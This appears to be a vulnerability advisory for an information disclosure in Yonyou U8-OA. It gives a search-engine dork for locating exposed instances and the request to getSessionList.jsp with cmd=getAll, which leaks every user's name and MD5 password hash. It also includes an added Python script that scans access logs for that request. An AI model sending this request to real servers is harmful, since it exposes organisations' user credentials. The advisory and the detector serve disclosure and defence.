Yonyou OA getSessionList.jsp information disclosure

2016-01-21T00:00:00
ID SSV:90552
Type seebug
Reporter nnnn
Modified 2016-01-21T00:00:00

Description

https://g.jiuminghu.com/#newwindow=1&q=intitle:%E3%80%8A%E7%94%A8%E5%8F%8BU8-OA%E3%80%8B&btnK=+%E6%90%9C%E7%B4%A2

intitle:《用友U8-OA》

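A Google search with this query returns a large number of cases.

The vulnerability is located at: http://www.example.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll

This vulnerability allows an attacker to obtain the usernames and password MD5 hashes of all users.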
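To check whether the endpoint named above has been requested on a server you operate, the access logs can be searched for it. The following is an added example, not part of the original advisory: it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Path and parameter come from the advisory; lowercased for case-insensitive matching.
TARGET_PATH = "/yyoa/ext/https/getsessionlist.jsp"

# Assumed log layout: ip - user [time] "METHOD uri PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2016:10:02:11 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Jan/2016:10:02:15 +0800] "GET /yyoa/ext/https/%67etSessionList.jsp;x=1?CMD=getall HTTP/1.1" 200 5120',
    '198.51.100.4 - - [21/Jan/2016:10:05:00 +0800] "GET /yyoa/index.jsp HTTP/1.1" 200 900',
    '198.51.100.9 - - [21/Jan/2016:10:06:00 +0800] "GET /yyoa/ext/https/getSessionList.jsp?cmd=getAll HTTP/1.1" 404 0',
]

def normalize_path(raw_path):
    """Decode percent-encoding, drop ';param' path parameters, collapse slashes."""
    path = unquote(raw_path)
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return re.sub(r"/{2,}", "/", path).lower()

def find_hits(lines):
    """Return one record per logged request that targeted getSessionList.jsp."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        path, _, query = m["uri"].partition("?")
        if normalize_path(path) != TARGET_PATH:
            continue
        params = {k.lower(): [v.lower() for v in vs]
                  for k, vs in parse_qs(query).items()}
        hits.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "get_all": "getall" in params.get("cmd", []),
            # A 200 means the page was served, so the listing may have been exposed.
            "served": m["status"] == "200",
        })
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

Any record with `served` set to true is a reason to treat the listed accounts' passwords as exposed and to restrict access to the JSP.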